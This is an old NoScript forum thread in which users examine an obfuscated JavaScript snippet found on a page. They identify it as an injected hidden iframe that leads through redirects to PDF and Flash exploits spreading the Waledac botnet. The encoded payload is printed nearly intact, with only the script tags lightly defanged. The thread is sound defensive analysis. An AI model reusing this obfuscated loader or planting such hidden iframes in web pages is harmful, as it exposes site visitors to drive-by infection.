InformAction Forums

NoScripters and WebSec nerds of all lands, unite!
https://forums.informaction.com/

Is this fishy script?

https://forums.informaction.com/viewtopic.php?t=1677

Page 1 of 1

Is this fishy script?

Posted: Thu Jun 18, 2009 9:42 am
by luntrus
Hi forum members,

Whenever you see code of a certain nature, your NoScript ears start to stick out. So when I stumbled onto this row code I want to know: "Is this normal code or suspicious obfuscated malcode?

Code: Select all

 EDITED for SECURITY REASONS with * and ^[/scr*pt type="text/j*v*script"^var qhEHJJekBOuKGRbXCPKz = "ewLOJ60ewLOJ105ewLOJ102ewLOJ114ewLOJ97ewLOJ109ewLOJ101ewLOJ32ewLOJ119ewLOJ105ewLOJ100ewLOJ116ewLOJ104ewLOJ61ewLOJ34ewLOJ52ewLOJ56ewLOJ48ewLOJ34ewLOJ32ewLOJ104ewLOJ101ewLOJ105ewLOJ103ewLOJ104ewLOJ116ewLOJ61ewLOJ34ewLOJ54ewLOJ48ewLOJ34ewLOJ32ewLOJ115ewLOJ114ewLOJ99ewLOJ61ewLOJ34ewLOJ104ewLOJ116ewLOJ116ewLOJ112ewLOJ58ewLOJ47ewLOJ47ewLOJ104ewLOJ105ewLOJ116ewLOJ45ewLOJ115ewLOJ101ewLOJ110ewLOJ100ewLOJ101ewLOJ114ewLOJ115ewLOJ46ewLOJ99ewLOJ110ewLOJ47ewLOJ102ewLOJ105ewLOJ110ewLOJ100ewLOJ47ewLOJ105ewLOJ110ewLOJ46ewLOJ99ewLOJ103ewLOJ105ewLOJ63ewLOJ55ewLOJ34ewLOJ32ewLOJ115ewLOJ116ewLOJ121ewLOJ108ewLOJ101ewLOJ61ewLOJ34ewLOJ98ewLOJ111ewLOJ114ewLOJ100ewLOJ101ewLOJ114ewLOJ58ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ112ewLOJ111ewLOJ115ewLOJ105ewLOJ116ewLOJ105ewLOJ111ewLOJ110ewLOJ58ewLOJ114ewLOJ101ewLOJ108ewLOJ97ewLOJ116ewLOJ105ewLOJ118ewLOJ101ewLOJ59ewLOJ32ewLOJ116ewLOJ111ewLOJ112ewLOJ58ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ108ewLOJ101ewLOJ102ewLOJ116ewLOJ58ewLOJ45ewLOJ53ewLOJ48ewLOJ48ewLOJ112ewLOJ120ewLOJ59ewLOJ32ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ58ewLOJ48ewLOJ59ewLOJ32ewLOJ102ewLOJ105ewLOJ108ewLOJ116ewLOJ101ewLOJ114ewLOJ58ewLOJ112ewLOJ114ewLOJ111ewLOJ103ewLOJ105ewLOJ100ewLOJ58ewLOJ68ewLOJ88ewLOJ73ewLOJ109ewLOJ97ewLOJ103ewLOJ101ewLOJ84ewLOJ114ewLOJ97ewLOJ110ewLOJ115ewLOJ102ewLOJ111ewLOJ114ewLOJ109ewLOJ46ewLOJ77ewLOJ105ewLOJ99ewLOJ114ewLOJ111ewLOJ115ewLOJ111ewLOJ102ewLOJ116ewLOJ46ewLOJ65ewLOJ108ewLOJ112ewLOJ104ewLOJ97ewLOJ40ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ61ewLOJ48ewLOJ41ewLOJ59ewLOJ32ewLOJ45ewLOJ109ewLOJ111ewLOJ122ewLOJ45ewLOJ111ewLOJ112ewLOJ97ewLOJ99ewLOJ105ewLOJ116ewLOJ121ewLOJ58ewLOJ48ewLOJ34ewLOJ62ewLOJ60ewLOJ47ewLOJ105ewLOJ102ewLOJ114ewLOJ97ewLOJ109ewLOJ101ewLOJ62";var wqfYyLudgHIXoMexWJhX = qhEHJJekBOuKGRbXCPKz.split("ewLOJ");var XbidtJBvZLvVCbuBmoeS = "";for (var wnqkAUhXdPuBrdekmggM=1; wnqkAUhXdPuBrdekmggM<wqfYyLudgHIXoMexWJhX.length; wnqkAUhXdPuBrdekmggM++){XbidtJBvZLvVCbuBmoeS+=String.fromCharCode(wqfYyLudgHIXoMexWJhX[wnqkAUhXdPuBrdekmggM]);}var VyodIJUOXMuOEyNuLfLF = ""+XbidtJBvZLvVCbuBmoeS+"";document.write(""+VyodIJUOXMuOEyNuLfLF+"")^/script^
Like to hear your views on the matter,

luntrus

Re: Is this fishy script?

Posted: Thu Jun 18, 2009 9:54 am
by Tom T.
The only reason I can think of offhand for a single string of 1,737 characters is as an encryption key... and, uh, aren't those usually put into hex?
Especially when the entire string consists of

Code: Select all

ewLOJ*
repeated endlessly, where * = a two- or three-digit integer (decimal).

No code expert here, but I'd be very surprised if there were some legitimate, non-obfuscating use for such a string.

Re: Is this fishy script?

Posted: Thu Jun 18, 2009 12:06 pm
by mik33mik
It's an obfuscated malicious script, in an invisible iframe, that redirect to a .cn site with a frame containing a porn site. This porn site has a javascript that redirect to a web server containing various exploits for adobe pdf reader, and flash player.
If the exploit is successful, your machine will become a zombie PC of the Waledac botnet.

Re: Is this fishy script?

Posted: Thu Jun 18, 2009 3:07 pm
by therube
AVAST forum thread, my own website (that I built) suddenly has trojan horse - help!.

Oh, & if you do go about visiting the site in question, do use your head ;-).
(Earlier I found a different site with that same exploit, but can't seem to find it again?)

Re: Is this fishy script?

Posted: Fri Jun 19, 2009 6:13 am
by Tom T.
mik33mik wrote:It's an obfuscated malicious script, in an invisible iframe, that redirect to a .cn site with a frame containing a porn site. This porn site has a javascript that redirect to a web server containing various exploits for adobe pdf reader, and flash player.
If the exploit is successful, your machine will become a zombie PC of the Waledac botnet.
mik33mik, thank you, and it's nice to have an advanced detective here! :) ... since the exploit uses iFrames, JS, Flash, and Adobe pdf, then even those who went there, with NoScript in full lockdown (no scripting, no iframes, no Flash) and with Adobe JS disabled, as it should be for those who persist in using this unsafe PDF reader when safer ones are present, would still be protected, true? .. thanks again for detailed explanation.

btw, may we ask how you knew? are you in the anti-malware business also? Just curious.
All times are UTC
Page 1 of 1

Powered by phpBB® Forum Software © phpBB Limited